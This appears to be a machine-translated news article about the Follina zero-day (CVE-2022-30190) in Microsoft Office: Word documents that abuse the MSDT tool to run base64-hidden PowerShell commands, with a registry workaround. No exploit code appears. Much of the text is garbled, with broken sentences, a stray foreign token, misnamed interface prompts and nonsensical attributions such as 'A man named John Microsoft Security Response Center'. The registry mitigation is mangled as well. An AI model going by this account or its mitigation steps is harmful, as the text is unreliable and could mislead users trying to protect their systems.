This code uses a flaw called Folina. It’s classified as “Zero-Day”, in other words, by pirates already exploited and not updated (Microsoft has “zero days” to release a patch). തിരnao_sec While searching for documents with another flaw, the virus accidentally noticed a suspicious code on the site. An Internet user based in Belarus submitted a suspicious document to the site that will check if it was detected by various antiviruses.
A code hidden in base 64
The code software’s remote template feature is used to load an HTML file from. Disabled. Used the same technology as the author of the code To hide problematic commands: they are converted to base 64 and decoded in runtime.. This then redirects the device From Microsoft Support (MSDT) for uploading a file and executing PowerShell commands. This, even if
Since the second file is not available, researchers do not know the exact purpose of the author. However, from the moment it is controlled to run PowerShell commands, it has the potential to take full control of the computer and attack other machines..
Folina is particularly problematic. By default, Word .docx files are opened in protected view. The code is only executed when the user clicks on “Enable Update”. However, if it is in .rtf format, this protection is not active. Also, in this case, you just need to select the code to execute it without opening it in File Explorer.
An overview of how Folina works in the updated version of Office 2021. © Diier Stevens
In April, Microsoft already rejected a report
The code works on all versions In April the Shadow Chaser Group, a group of students pursuing differences. A man named John Microsoft Security Response Center (MSRC), satisfied that it was not A , The submitted sample does not work on his computer. Microsoft seems to have changed its mind since the company registered an error on May 30 under reference CVE-2022-30190.At least since 2013, with all updates, including Office 2021. Indications are that the problem was reported earlier
Currently, there is no easy way to protect yourself from this attack. While waiting for an update, the most common solution is to edit the registry to prevent the diagnostic tool from launching in Word. To do this, we need to create value Enable diagnostics Inn HKLM \ Software \ Policies \ Microsoft \ Windows \ ScriptedDiagnostics Put .
But beware, this solution is reserved for advanced users. An error in updating the registry will cause the system to crash and prevent the computer from starting.
Problem solver. Incurable bacon specialist. Falls down a lot. Coffee maven. Communicator.